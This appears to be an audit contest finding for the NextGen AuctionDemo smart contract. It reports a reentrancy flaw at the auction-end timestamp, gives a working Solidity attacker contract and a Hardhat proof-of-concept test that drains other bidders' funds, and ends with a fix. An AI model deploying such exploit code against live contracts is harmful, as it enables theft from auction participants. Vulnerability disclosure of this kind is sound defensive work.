NextGen - aldarion's results

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L105 https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L125

Vulnerability details

Impact

auctionDemo.claimAuction() and auctionDemo.cancelBid() can be accessed at the same time if block.timestamp == minter.getAuctionEndTime(_tokenid). Since miners can manipulate the timestamp auction winner can use this for exploit. Auction winner can claim his NFT at this timestamp and when his failing offers are repaid he can call auctionDemo.cancelBid() in a reentrancy call to exploit and potentially steal from other participants.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Attacker Contract:

contract Attacker {
    auctionDemo public auction;
    uint256 public tokenId;

    constructor(address auctionAddress, uint256 _tokenId) {
        auction = auctionDemo(auctionAddress);
        tokenId = _tokenId;
    }

    receive() external payable {
        (, , bool status) = auction.auctionInfoData(tokenId, 0);
        if (status) {
            auction.cancelBid(tokenId, 0);
        }
    }

    function participate() external payable {
        auction.participateToAuction{value: msg.value}(tokenId);
    }

    function claim() external {
        auction.claimAuction(tokenId);
    }

    function getBalances() public view returns (uint) {
        return address(this).balance;
    }

    function onERC721Received(
        address,
        address,
        uint256,
        bytes calldata
    ) external returns (bytes4) {
        return this.onERC721Received.selector;
    }

POC test:

    it("#AuctionAttack", async function () {

      let currentTimestamp = await time.latest();
      await contracts.hhMinter.mintAndAuction(
        signers.owner.address, // _recipients
        '{"tdh": "100"}',
        1111,
        2, // _collectionID
        currentTimestamp + 100000, // _auctionEndTime
      );
      let tokenId = 20000000000 + 1;
      expect(await contracts.hhMinter.getAuctionStatus(tokenId)).to.equal(true);
      await contracts.hhCore.approve(await contracts.hhauctionDemo.getAddress(), tokenId);

      // Attacker contract doesnt have any eth
      expect(await contracts.hhAttacker.getBalances()).to.equal(0);

      // Addr3 sends ETH to the attacker and participates in the auction
      const participationAmount = 100000000000000000
      await contracts.hhAttacker.connect(signers.addr3).participate({ value: BigInt(participationAmount) })

      // Other bidders participate in the auction
      await contracts.hhauctionDemo.connect(signers.addr1).participateToAuction(tokenId, { value: BigInt(2 * participationAmount) });

      await contracts.hhauctionDemo.connect(signers.addr2).participateToAuction(
        tokenId,
        { value: BigInt(3 * participationAmount) }
      );

      // Attacker sends the largest amount and wins the auction
      await contracts.hhAttacker.connect(signers.addr3).participate({ value: BigInt(4 * participationAmount) })

      // Set the timestamp to the auction end time
      let auctionEnd = await contracts.hhMinter.getAuctionEndTime(tokenId);
      await ethers.provider.send("evm_setNextBlockTimestamp", [Number(auctionEnd)]);

      // Attacker claims the NFT
      await contracts.hhAttacker.connect(signers.addr3).claim()

      // Attacker recives 2x of his deposit
      expect(await contracts.hhAttacker.getBalances()).to.equal(BigInt(2 * participationAmount));
    })

Tools Used

harhat, vscode

Recommended Mitigation Steps

    function cancelBid(uint256 _tokenid, uint256 index) public {
-        require(block.timestamp <= minter.getAuctionEndTime(_tokenid), "Auction ended");
+        require(block.timestamp < minter.getAuctionEndTime(_tokenid), "Auction ended");

Assessed type

Reentrancy